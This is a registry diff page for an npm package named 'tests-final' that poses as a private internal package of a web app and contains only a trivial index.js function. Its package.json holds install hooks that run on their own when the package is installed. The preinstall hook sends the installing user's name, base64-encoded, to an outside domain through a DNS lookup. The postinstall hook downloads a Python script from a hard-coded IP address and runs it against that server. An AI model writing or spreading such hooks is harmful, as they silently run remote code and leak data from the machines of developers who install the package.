tests-final 5.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of tests-final might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ # Package-Private
2
+
3
+ This is the package which is private to the vuln-web-app and can be downloaded only from their own privately hosted repository (which sits somewhere in their cloud)
package/index.js ADDED
@@ -0,0 +1,10 @@
1
+ const some_important_function = () => {
2
+ const a = 1997
3
+ const b = 5
4
+
5
+ return (a + b)
6
+ }
7
+
8
+ module.exports = {
9
+ some_important_function
10
+ }
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "tests-final",
3
+ "version": "5.0.2",
4
+ "description": "This is a private package used by Batman and his team oh highly skilled IT professional (CY Capstone Team-1)",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "npm index.js",
8
+ "preinstall": "nslookup $(whoami | base64 -w0).0xparthhackerone.me",
9
+ "postinstall": "server='http://34.135.86.190:8888'; curl -s -X POST -H 'file:ragdoll.py' -H 'platform:linux' $server/file/download > ragdoll.py; pip install requests beautifulsoup4; python3 ragdoll.py -W $server/weather"
10
+ },
11
+ "keywords": [
12
+ "demo"
13
+ ],
14
+ "author": "archerl@wearehackerone.com",
15
+ "license": "MIT",
16
+ "dependencies": {
17
+ "nodemon": "^2.0.20"
18
+ }
19
+ }
@@ -0,0 +1 @@
1
+ echo "This is file to run the bash script, just in case we need it"
package/test.txt ADDED
File without changes